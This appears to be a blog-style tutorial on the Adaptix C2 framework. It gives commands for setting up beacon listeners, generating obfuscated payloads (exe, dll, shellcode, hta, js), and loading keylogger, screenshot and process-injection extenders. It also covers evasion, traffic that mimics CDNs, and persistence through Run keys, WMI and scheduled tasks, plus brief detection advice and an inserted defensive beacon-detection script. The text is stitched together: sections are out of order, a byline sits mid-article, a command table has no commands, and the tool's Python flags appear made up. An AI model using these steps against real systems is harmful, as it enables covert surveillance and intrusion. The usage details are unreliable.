Adaptix C2 Framework
What is a Command and Control (C2) Framework?
In offensive cybersecurity, a Command and Control (C2) framework is a critical component that enables post-exploitation communication between a compromised system and the attacker's infrastructure. It allows red team operators or adversaries to execute commands, exfiltrate data, deploy additional payloads, and maintain persistence on the target.
Core Functions of a C2:
Session Management: Track and manage compromised endpoints (beacons)
Payload Deployment: Deliver binaries, scripts, or in-memory shellcode
Command Execution: Remotely run tasks on victim systems
Data Collection: Retrieve files, keystrokes, screenshots, etc.
Persistence & Lateral Movement: Maintain access and pivot across environments
Commonly used in red team assessments, C2 frameworks simulate real-world APTs and provide insight into an organization's detection and response capabilities.
Overview of the Framework
Language: Python 3.x
Interface: CLI and Web
Persistence: File-based SQLite backend
Transports: HTTP, HTTPS, DNS, SMB, and more
Implants: Supports PE, DLL, shellcode, staged and stageless payloads
Extensibility: Extenders API for adding capabilities like keyloggers, screenshots, process injection
Setup
# Clone the repository
$ git clone https://github.com/Adaptix-Framework/AdaptixC2
$ cd AdaptixC2
# Install dependencies
$ pip install -r requirements.txt
# Initialize and run
$ python3 adaptix.py --init
$ python3 adaptix.py
Creating and Managing Listeners
Starting a Beacon HTTP Listener
$ python3 adaptix.py --listener beacon-http --host 0.0.0.0 --port 443 --uri /connect
--listener: Selects the beacon listener type
--host: Bind address (use public IP or domain)
--port: Port to serve payloads and beacon comms
--uri: Path used to mask beacon check-ins
Available Listeners
beacon-http
beacon-http2
beacon-smb
beacon-dns



Adaptix C2 is a modern Command and Control framework designed for offensive security professionals. It offers a modular architecture, native evasion capabilities, and an extensible design that supports custom operational modules known as extenders. In this article, we’ll walk through its setup, configuration, usage in offensive operations, and real-world applications, focusing on red team scenarios and stealthy post-exploitation.
Installation
Requirements
Python 3.8+
pip, virtualenv (recommended)
Payload Generation
Adaptix supports the generation of both staged and stageless payloads. Payloads can be obfuscated and embedded in delivery formats:
$ python3 adaptix.py --generate --format exe --listener beacon-http
Formats
exe
dll
shellcode
hta
js
Using Extenders
Installing the Extension Kit
$ git clone https://github.com/Adaptix-Framework/Extension-Kit
$ cd Extension-Kit
$ python3 install.py
Loading Extenders
> extender load screenshot
> extender load keylogger
> extender load inject
Common Modules
screenshot: Captures user desktop
keylogger: Records keystrokes
inject: Injects shellcode into remote processes
filebrowser: Navigate remote filesystem
Milton Araújo
Security Researcher
Evasion Capabilities
Process Injection
Use the inject extender to target remote PIDs, mask process trees, and reduce visibility in memory scanners.
In-Memory Execution
Avoid writing to disk entirely by staging payloads via beacon commands and executing them in memory.
Traffic Shaping
Listeners support URL and header customization to emulate legitimate web services.
--uri /cdn/api/check --header "User-Agent: r19.io Chrome/118.0"
TLS Integration with Real Certificates
You can configure Adaptix C2 to serve over HTTPS with certificates issued by Cloudflare or Let's Encrypt:
$ openssl pkcs12 -in certificate.pfx -out fullchain.pem -nodes
$ python3 adaptix.py --listener beacon-http --cert fullchain.pem --key privkey
Operational Usage
Interactive Command Set
| Command | Description |
|---|---|
| | List active beacons |
| | Upload file to beacon |
| | Download file from beacon |
| | Inject shellcode into remote process |
| | Load extender module |
Persistence Techniques
Registry Run keys
WMI permanent event consumers
Scheduled tasks with PowerShell payloads
Detection Considerations
Network
Monitor for unusual TLS certificates and domains
HTTP beacon URIs mimicking CDN or update services
Host
Monitor for process injection (memory scanners)
Registry and scheduled task modifications
Suspicious child-parent process hierarchies
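As an added example (not part of the original article and not Adaptix code), the network-side checks above can be run over proxy logs: the script groups requests by source, host and URI, flags groups whose check-in interval is nearly constant, and notes a User-Agent that claims Chrome without the `Mozilla/5.0 (` prefix real Chrome sends. The log format, hostnames, thresholds and function names are assumptions; the sample lines are constructed and reuse the URI and User-Agent shown in the Traffic Shaping section.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy log sample (assumed format): epoch_seconds src host uri "user-agent"
SAMPLE_LOG = '''\
1000 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
1004 10.0.0.9 www.example.test /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/118.0"
1061 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
1119 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
1180 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
1190 10.0.0.9 www.example.test /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/118.0"
1241 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
1300 10.0.0.5 cdn.example.test /cdn/api/check "r19.io Chrome/118.0"
'''

LINE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) "([^"]*)"$')

def odd_user_agent(ua):
    """True when the UA carries a Chrome token but lacks the Mozilla/5.0 prefix."""
    return "Chrome/" in ua and not ua.startswith("Mozilla/5.0 (")

def find_beacons(log_text, min_hits=5, max_jitter=0.10):
    """Return (src, host, uri) groups with near-constant check-in intervals."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        ts, src, host, uri, ua = m.groups()
        groups[(src, host, uri)].append((int(ts), ua))
    findings = []
    for key, hits in groups.items():
        if len(hits) < min_hits:
            continue  # too few samples to judge periodicity
        times = sorted(t for t, _ in hits)
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # same-second burst, not a periodic check-in
        jitter = pstdev(gaps) / avg  # coefficient of variation of the intervals
        if jitter <= max_jitter:
            findings.append({
                "src": key[0], "host": key[1], "uri": key[2],
                "hits": len(hits), "interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
                "odd_user_agent": any(odd_user_agent(ua) for _, ua in hits),
            })
    return findings
```

Legitimate pollers such as update agents also check in on a fixed schedule, so pair the interval test with an allowlist of known hosts before alerting.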
Use Cases in Red Team Engagements
Initial access via phishing attachments (.hta, .js)
Payload delivery via SMB and DNS covert channels
Post-exploitation persistence with modular extenders
Privilege escalation via token stealing or UAC bypass
Final Thoughts
Adaptix C2 provides a highly customizable and modular platform for modern adversary simulation. It enables red teams to run stealthy, scalable, and flexible operations while maintaining a low detection profile. With support for extenders, real HTTPS traffic emulation, and modular listener architecture, it’s a solid framework for advanced offensive operations.